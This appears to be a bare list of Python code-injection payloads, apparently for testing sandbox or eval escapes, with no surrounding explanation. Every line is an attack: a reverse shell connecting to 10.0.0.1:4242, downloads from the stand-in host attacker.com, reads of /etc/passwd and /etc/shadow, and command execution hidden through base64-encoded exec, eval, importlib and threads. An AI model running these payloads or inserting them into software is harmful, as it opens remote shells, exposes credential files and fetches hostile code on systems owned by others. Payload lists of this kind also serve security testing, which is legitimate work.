```python
import os; os.system('id')
import subprocess; subprocess.call(['ls', '-la'])
__import__('os').system('whoami')
from os import system; system('uname -a')
import socket, subprocess, os; s=socket.socket(); s.connect(('10.0.0.1',4242)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(['/bin/sh','-i'])
import sys; sys.exit(__import__('subprocess').call(['curl', 'http://attacker.com/python']))
open('/etc/passwd').read()
open('/etc/shadow').read()
exec('os.system("id")')
eval('__import__("os").system("id")')
import base64;exec(base64.b64decode(b'aW1wb3J0IG9zO29zLnN5c3RlbSgnaWQnKQ=='))
import urllib.request; urllib.request.urlopen('http://attacker.com/script.py').read()
import requests; requests.get('http://attacker.com/malware')
import importlib; importlib.import_module('os').system('id')
__import__('subprocess').run(['bash','-c','id'])
from subprocess import Popen;Popen(['bash','-c','id'])
import threading; threading.Thread(target=__import__('os').system, args=('id',)).start()
__import__('subprocess').run('touch /tmp/evade',shell=True)
```
